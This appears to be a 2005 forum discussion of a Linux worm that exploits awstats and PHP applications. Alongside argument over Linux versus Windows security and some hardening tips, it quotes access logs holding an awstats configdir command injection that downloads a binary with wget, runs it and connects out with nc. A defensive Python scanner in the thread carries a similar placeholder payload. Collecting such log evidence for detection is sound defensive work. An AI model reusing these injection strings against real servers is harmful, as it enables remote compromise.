That's what you believe. Yet my bank example shows that popularity has nothing to do with security.
That is because your statement is as inaccurate as possible already.
By your "logic", banks would be robbed far more often than homes or cars or people because they are more popular.
And security is why this worm will not do much damage.
http://securityresponse.symantec.com/avcenter/ven
Look for "Number of Infections: 0-49".
Oooooh! Scary! All those millions of Linux sites out there and fewer than 50 have been infected! Ooooooh!
What's that? "Number of Sites: 0-2"?
That means that fewer than 3 sites have been infected? Out of all of the Linux installations out there?
Yeah, "security issues" will certainly be a problem as more people use Linux. I feel really bad for those 2 sites (or less) that were hit by this. Yep. It's a real threat.
4. Host with a good website company like 34sp.com (shameless plug with who I am hosted on)
Sweet! Do you get that girl on the front page after signing up for a year prepaid?
I love all the damage control the fanboi's throw out there.
OH THIS ISN'T A BIG DEAL
OH THIS ISN'T A LINUX PROBLEM SPECIFICALLY
OH IT'S ONLY ON THE 3RD SUNDAY OF THE 5TH MONTH
OH IF THIS WERE WINDOZ (INSERT NOT FUNNY JOKE HERE)
Come on guys, admit you got stung and deal with it. The more popular Linux becomes the more hackers will want to get into it. And since all the source for just about everything is out there, it's a lot easier for the smart ones to find, test, & exploit vulnerabilities.
You're no more secure than the rest of us, you just weren't on the radar. Now you are. Expect more to come.
Gadget News at Gizmo.com
I'm not seeing anything on my logs.
Why don't you post 10 of those "large number of IP addresses" to substantiate your claim?
Or is this a different worm that exploits awstats?
First scan at my webserver:
xx.113.128.xxx - - [17/Feb/2005:04:36:36 -0800] "GET /cgi-bin/awstats.pl HTTP/1.1" 404 300 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
Second scan:
xxx.19.218.xx - - [18/Feb/2005:05:58:19 -0800] "GET //cgi/awstats.pl?configdir=|%20id%20| HTTP/1.1" 404 297 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
An attempt a few days (and a few scans) later which appears to be a self-sustaining worm:
xx.221.80.xx - - [26/Feb/2005:18:30:46 -0800] "GET /cgi-bin/awstats.pl?configdir=%20%7c%20cd%20%2ftmp%3bwget%20www.ment0ru.home.ro%2fnc%3bchmod%20%2bx%20nc%3b.%2fnc%20something4u.propagation.net%2065000%20%7c%20 HTTP/1.1" 404 300 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)"
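As an added example, not code from anyone in this thread, here is the check an admin would run over access-log entries like the ones posted above: parse Apache combined-format lines, percent-decode the awstats configdir parameter, flag values that carry shell metacharacters, and pull out any host the injected command tries to fetch from so it can be blocked or watched at the egress. The log lines, addresses and hostnames in it are constructed placeholders.

```python
import re
from urllib.parse import unquote

# Apache "combined" log format: host ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# Shell metacharacters that have no business in an awstats configdir value.
SHELL_META = re.compile(r'[|;`$&<>]')
# Host (and optional path) that the injected command tries to fetch from or connect to.
FETCH_RE = re.compile(r'\b(?:wget|curl|nc)\s+(?P<target>[\w.\-]+(?:/[\w./\-]*)?)')

# Constructed sample entries (not real traffic); addresses and hosts are placeholders.
SAMPLE_LOG = [
    # Ordinary awstats report request: must not be flagged.
    '203.0.113.10 - - [08/Nov/2005:10:02:11 -0800] "GET /cgi-bin/awstats.pl?config=example '
    'HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    # Probe: configdir is a pipe that runs id. Flagged even though the server answered 404.
    '198.51.100.7 - - [08/Nov/2005:10:05:40 -0800] "GET //cgi-bin/awstats.pl?configdir=|%20id%20| '
    'HTTP/1.1" 404 297 "-" "Mozilla/4.0"',
    # Worm-style attempt: fetch a binary from a remote host and run it.
    '198.51.100.7 - - [08/Nov/2005:10:06:02 -0800] "GET /cgi-bin/awstats.pl?configdir='
    '%20%7c%20cd%20%2ftmp%3bwget%20dropper.example.net%2fpayload%3bchmod%20%2bx%20payload'
    '%3b.%2fpayload%20%7c%20 HTTP/1.1" 404 300 "-" "Mozilla/4.0"',
]

def analyse_line(line):
    """Return a finding for an awstats configdir injection attempt, or None."""
    m = LOG_RE.match(line.rstrip("\n"))
    if not m:
        return None
    parts = m.group("request").split(" ")   # METHOD PATH PROTOCOL
    if len(parts) < 2 or "awstats.pl" not in parts[1] or "?" not in parts[1]:
        return None
    for param in parts[1].split("?", 1)[1].split("&"):
        name, _, value = param.partition("=")
        decoded = unquote(value)            # the log keeps the request percent-encoded
        if name == "configdir" and SHELL_META.search(decoded):
            return {
                "source": m.group("host"),
                "time": m.group("time"),
                "status": int(m.group("status")),
                "command": decoded,
                "targets": [t.group("target") for t in FETCH_RE.finditer(decoded)],
            }
    return None

def scan(lines):
    """All injection findings in an iterable of log lines, in order."""
    return [f for f in map(analyse_line, lines) if f is not None]

def download_hosts(findings):
    """Remote hosts the injected commands pull from: candidates for an egress block/watch list."""
    return {t.split("/", 1)[0] for f in findings for t in f["targets"]}

if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for f in hits:
        print(f["time"], f["source"], "status", f["status"], "->", f["command"].strip())
    print("download hosts:", sorted(download_hosts(hits)))
```

A 404 in these entries only means the script was not at that path on this host; the source address was still probing, which is why the status is reported rather than used to filter.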
According to the linked site, you are vulnerable if you are running PHP (version?) and have a /{website dir}/cgi-bin directory. I guess that means anyone running PHP is vulnerable?
-"...bad old ideas look confusingly fresh when they are packaged as technology" - Jaron Lanier (Digital Maoism on Edge.o
I would like to point out a significant detail. It is far easier to deflect blame away from Linux than it is from Windows because, unlike Windows, Linux doesn't "automatically install" anything. Linux is just a kernel. A linux distro is just a Linux kernel with hundreds of "3rd party apps" tacked on. I'm not knocking Linux at all. I love Linux. But it's not a fair comparison when you're playing the "installed by default" game. The Linux kernel is 100% secure because it can't do anything by itself.
If you mod me down, I shall become less powerful than you could possibly imagine.
Several people have noted that this only affects systems that allow a CGI or PHP script to execute arbitrary programs. I don't think most Windows systems have that sort of "shell" access from CGI/PHP. Then again, I know ALAP about Windows...
why... That's not MS sharing the IE love, its them trying to open up Macs to virus', those dirty scoundrels!
192.50.74.27
Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2005-11-08 09:49 PST
All 1663 scanned ports on 192.50.74.27 are: filtered
Nmap finished: 1 IP address (1 host up) scanned in 38.322 seconds
========
195.200.183.229
Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2005-11-08 09:51 PST
Interesting ports on 195.200.183.229:
(The 1661 ports scanned but not shown below are in state: filtered)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap finished: 1 IP address (1 host up) scanned in 62.432 seconds
========
200.218.224.224
Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2005-11-08 09:53 PST
All 1663 scanned ports on 200.218.224.224 are: filtered
Nmap finished: 1 IP address (1 host up) scanned in 39.839 seconds
========
202.123.223.148
I killed the process after 2 minutes.
========
210.109.194.231
I killed this one too.
========
211.155.246.38
Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2005-11-08 10:01 PST
All 1663 scanned ports on 211.155.246.38 are: filtered
Nmap finished: 1 IP address (1 host up) scanned in 38.386 seconds
========
Okay, I'm stopping there. I was under the impression that I'd be seeing some open ports. I can only verify port 80 on ONE of those so far.
How OLD are those entries? Why does it appear that the problem, if it ever existed on those machines, has been cleared already?
How did we get stung? Not being dependent on Micro$hit to deliver fixes to buggy 3rd-party scripts, this was "fixed" back in February. *Yawn.*
Now, I don't think most worms really process such errors but it makes me feel better than just ignoring them, and it seems to be far more legal than either redirecting them to fbi.gov or launching some kind of counterattack.
PHEM - party like it's 1997-2003!
Don't tell the windows people that linux has security holes, they may decide it's payback time!
"A new Linux worm is crawling the web looking for a large number of vulnerable PHP systems and applications."
Good luck buddy, I don't think you're gonna find 'em...
What every sysadmin should know is that the unpatched known holes of today are not only open doors for crackers, they are the open doors for the next worms.
Every sysadmin should check security sites like Secunia, with a list of unpatched known holes for each software they use:
http://secunia.com/
Unless you have tripwire or some off-disk checksums of your hard drive, you have no choice but to wipe and re-install configs and data from backups. If you haven't designed your systems to make this easy (keep all configs in /etc, /usr/local/etc, keep all customer data in one dir, etc), you're just making extra work for yourself OR making excuses why you shouldn't clean up a pwned machine.
Sure, 99% of the time, script kiddies are easy to clean up after. You might run into that 1% that make themselves root with an unpublished exploit, and install a kernel mod to hide themselves, and you think "oh, it's just some kiddies littering /tmp, big deal".
That's happened to me exactly once in my 10+ year career, but once was too much!
Here are the reported numbers:
"Sources" is a count of infected PCs, i.e., unique IP addresses "originating traffic".
"Targets" are the PCs "receiving traffic".
"Records" is the number of PACKETS observed.
What is odd is that while there are supposedly 111 PCs that are infected and sending out hack attempts, those 111 PCs seem to target ONLY 8 PCs, and the total PACKETS transmitted/received on 11/03 was only 22K. Very strange. Very LOW numbers and with a VERY LIMITED number of boxes.
Notice that the majority of "infections" are occurring on Nov 3, 4 and 5, and the reports from THREE anti-virus houses are on the 4th and 5th, the same day as the big spike in the "infection":
A scan from VirusTotal detects "cback" as:
Antivirus Version Update Result
Fortinet 2.48.0.0 11.04.2005 Linux/Rev.B-bdr
Kaspersky 4.0.2.24 11.05.2005 Backdoor.Linux.Small.al
McAfee 4620 11.04.2005 Linux/BackDoor-Rev.b
For such an infinitesimally small number of supposedly hacked boxes these three anti-virus houses already have detection software which can see the "trojan". That is REALLY FAST detection code writing, deployment and reporting for such a SMALL number of boxes.
Has someone salted the Linux anti-virus mine to hype business?
Running with Linux for over 20 years!
if you're using mod_security on Apache/UNIX platforms, you can set this globally:
SecFilterSelective "THE_REQUEST" "xmlrpc\.php" "deny,status:412"
and only enable it for the VirtualHost blocks that need it:
SecFilterSelective "THE_REQUEST" "xmlrpc\.php" "allow,log"
you can also enable Apache's SetEnvIf & conditional logging to pipe all xmlrpc.php requests to a centralized log file for analysis. be sure to patch your stuff! :)
If you were in their situation, what would you do?
Considering that there is already ClamAV in Linux space? I'd probably be weaving a golden parachute.
This sig. intentionally left blank.
Whatever makes you feel better. Nice 'solid' analogy, LOL.
I've often noted that when faced with facts, the loser will make some braggart statement instead of attempting to present facts of his own.
And you're another example of that.
I've posted links and facts. You only have your claims based upon your complete lack of understanding of security. Buh bye!
I've been seeing requests for some of these URLs for 6 months now. I figured it was a worm but I know I'm patched and I don't run any of that stuff anyway. Amazing to me that people get owned by this sort of thing.
:-D
Between this and the SSH worm, maybe it's time to investigate using Windows ME with Personal Web Server.
The Anti-Blog
Did you just offer me a cluestick while simply rewording what I said? You didn't even address the point of my post. I am returning your stick "postage due"
If you mod me down, I shall become less powerful than you could possibly imagine.
going to members.lycos.co.uk/sugi brings up some other files that look like they are phishers too. I think rather than immediately shut them down, it would be more effective to set up a sting. Lycos could retrieve the last ip address to log into that account. If it wasn't a compromised machine, they could contact the isp. When the next login is attempted, they could have the isp locate which customer it is, and bust down their door.
It's really sad that the AV companies haven't tried to shut the site down via contacting Lycos. It really shows me their commitment to security for the sake of security.
If an officer ever threatens to taze you, say you have a pacemaker.
PHP is neither secure nor insecure. Individual applications are secure or insecure. PHP allows insecure applications and doesn't particularly encourage secure applications, nor does it limit the capabilities of secure applications.
There are application environments that are inherently safe... that is, they implement a sandbox that fails closed. Individual applications may be insecure, but if the application's security fails the attacker does not gain any capabilities that can be used to launch further attacks on other systems or other users on the same system.
Thank you for a well reasoned counterargument. You don't find many of those on here :-)
Regards,
Steve
Yes the title is a troll. No, the point is not.
/. are somewhat (though not much) more helpful than McAfee's removal instructions, which are to upgrade my version of a Windows virus checker. But SD really does not have a better answer for the concerned admin on what he should be looking for to ensure his system is safe.
Linux (and open source in general) is always touted as better than closed-source because there is such a large community of geeks who know the stuff well, so anyone looking for information can tap into the community of geeks to get answers, instead of calling an idiot tech rep for $$/hour.
Except that communities of geeks are notoriously unapproachable, and their willingness to part with their geekily gained information is low. If the responses to this Slashdot article are any indication, geeks are more interested in belittling others (including other geeks) than actually providing useful information.
Albeit the geekish hordes of
BTW, Wordpress 1.5 is safe.
Terrorists can attack freedom, but only Congress can destroy it.
Security is independent of popularity.
There is nothing about popularity that makes a system more or less secure.
No.
No. FEWER banks are robbed because they have BETTER security.
In order to get down to ZERO banks robbed, you'd have to get to PERFECT security.
Because their security is not perfect.
Now you're confusing "risk" with "security".
The two are not the same.
Security != Popularity
Security != Risk
Read "Attack Trees" by Bruce Schneier.
http://www.schneier.com/paper-attacktrees-ddj-ft.
Security is all about reducing the avenues of attack.
If a Linux box is 100% secure from digital attack via the Internet (no ports open), it is still vulnerable to someone breaking into your office and taking the box. Big fat hairy deal. But it is still safe from that worm.
It's not so easy to compare as that. Unless you consider an OS being widely deployed to be a security flaw -- in which case Linux is doomed to be as bad as Windows if it succeeds...
If an OS, let's call it X, is rare, worms can't spread quickly, just because they can't find instances to spread to. The effects of this are very non-linear, with the popular OS being at a very major disadvantage.
If X is rare, few felons will have the expertise to attack it.
If X is rare, few felons will have the motivation to attack it.
Conversely, if X is widespread, and hated among felons, it will be an attractive target.
If X is commonly business-critical, a great deal of publicity comes with each attack, and felons can get glory from the press and praise from their felonious peers.
The bottom line is that there are many factors beyond the security of an OS in how widespread a worm becomes. In addition to the issues I listed above, consider how quickly patches get pushed out, which depends both on OS support for security patch distribution and administrator attentiveness. Consider the bandwidth of the typical connection, the nature of the hole, how likely it is to be blocked by non-OS firewalls, etc. etc.
So I'm afraid the MS vs Linux security question isn't going to be settled at all by comparing this worm's spread to any other worm, nor even by comparing any large population of worms.
Sorry -- it would be nice if the world were so simple.
Internet Storm Center has information about a new variant reported by TrendMicro:
http://isc.sans.org/diary.php?storyid=829
and the description itself is at http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=ELF_LUPPER.B&VSect=P
Your analogy wasn't all that great, and definitely is not solid. So more people visit an individual bank than an individual house. However, there are a LOT more houses than banks. In a given period of time a lot more people visit any house than any bank. And looking at those statistics, yes residences are robbed more frequently than a bank.
Looking at that same data, banks still get robbed a decent amount despite there being a lot fewer of them than houses. This is probably because the reward is much greater. All that cash in one place gives a greater reward, and hence more people go for it. Having better security decreases how many people are willing to go for it, or are successful, but it still happens.
In the most basic terms it's based on difficulty, reward, and risk. In the case of worms, the larger the set of possible vulnerable machines the greater the reward. If linux really is more difficult it helps, but as the reward gets bigger there's more incentive.
So please, stop trying to ignore variables in the equation. Reward is most definitely part of it. If someone is trying to expand a botnet, then a greater number of PCs to infect is most definitely an incentive. As such an incentive grows, of course more people are going to attempt it. Sure, better security raises the difficulty and can help decrease this, but it definitely isn't the only part of the equation.
The reason why this worm exists is due to the wide deployment of Windows Desktops with this specific vulnerability. There just aren't many Linux Desktops out there to bother with them.
Call me a heretic, but this is roughly correct, with some caveats.
OSS systems tend to have patches available faster, so the bugs that lead to worms _can_ be fixed. It's just not realistic to expect that they will be _always_ fixed (or even _often_ fixed). There's also really nothing you can do about the "I love you" strain of worms other than user education.
my ISP blocks port 80 incoming....:-(
(Keeps my firewall logs short at least.)
Microsoft hasn't released an update for IE on OS X since 6/16/2003. They only released that small upgrade from 5.2.1 because of an asinine amount of bugs in 5.2.1, including one that I found and reported. They made a big to-do over 5.2.1 being their last Mac release. 2.5 years is more than long enough to consider that IE is no longer available as a Mac product. You can still pick up a Redhat release that supports Sparc (5.x). Does that mean that RH supports Sparcs? No, it doesn't.
I think the developers who left these vulnerabilities open should be financially responsible for the damage this may cause.
"Derp de derp."
i was scanned from 216.128.227.73 (19 hits) and 24.42.129.18 (14 hits).
first tries a wget from 195.224.174.18/nikon, 2. one from 24.224.174.18/listen
both are down.
a third tries to get 62.101.193.244/lupii from 64.246.0.38, but it's down, too.
"listen" is also tried from 24.224.2.174/listen
more info on it here: http://isc.sans.org/diary.php?storyid=823
I have to agree with this. While I've never been exceptionally pleased with Comcast's service or support, it's been decent at least. Lately, however, my connection quality has been terrible. First off, I'm not even getting anywhere near the bandwidth I'm supposed to be getting (less than half). More frustrating however, is the fact that a significant portion of my packets seemingly disappear and it seems to come in waves. My connection will run fine for a few minutes and then all (or nearly all) of my traffic is lost for several seconds. Which effectively causes a disconnect in any online game, ssh sessions to be dropped, and file downloads/uploads to be choked up - frustrating to say the least. I did some speed tests just a little while ago:
(All numbers in kbps):
down / up
487 / 354
405 / 357
136 / 354
2601 / 356
3175 / 323
2665 / 362
The first three low numbers were so low because the speed test client was just sitting there waiting for packets to come in (apparently this was one of the trouble times). Not only that but, unless I'm mistaken, my connection is supposed to be 7Mbps (8? they like to claim they've upped their speeds so often it's hard to know) down and 768kbps up. Not even my best speed test is greater than half my supposed bandwidth. Anyone else with Comcast having problems like this? Given Comcast's competence level in the past it doesn't surprise me all that much, I'm just pissed that they're basically the only deal in town... too bad a T1 is too expensive for me at the moment.
Still a lot better than, "If you're running Windows you're fucked."
I notice that one of the listed vulnerabilities in awstats - definitely the fault of the administrator because not only is there a patched awstats version to address this well-documented vulnerability (check the project page at sourceforge), but you should also NOT make awstats publicly available. Lock it down so it can be accessed either only from your local/LAN IP range, or at least use http authentication (read up on .htaccess, man htpasswd/htpasswd2).
If you don't understand how to do either, I wouldn't say that you shouldn't be allowed near computers (everyone has to start from somewhere) but I will tell you that you need to RTFM. Yesterday.
Chances are that if you don't have the vulnerable apps locked down or patched already, you've already been rooted. Download/install rkhunter and chkrootkit and run them, keep them updated, set them up on cron jobs (man crontab), and actually read the reports daily - or at least the summaries.
The Christian Right is Neither (Christian nor right). See: Matthew 23, Matthew 25, Ezekiel 16:48-50
The problem with Mac OS X (Darwin) is that /tmp is not its own filesystem:
# ls -l /
lrwxr-xr-x 1 root admin 11 Apr 25 2005 tmp@ -> private/tmp
It is just a dir that gets blown away every reboot from some commands in /etc/rc.
Furthermore, if one were to try and use a RAM disk (man hdid), you can only create ones with a static # of sectors. In other words, Mac OS X has nothing like tmpfs.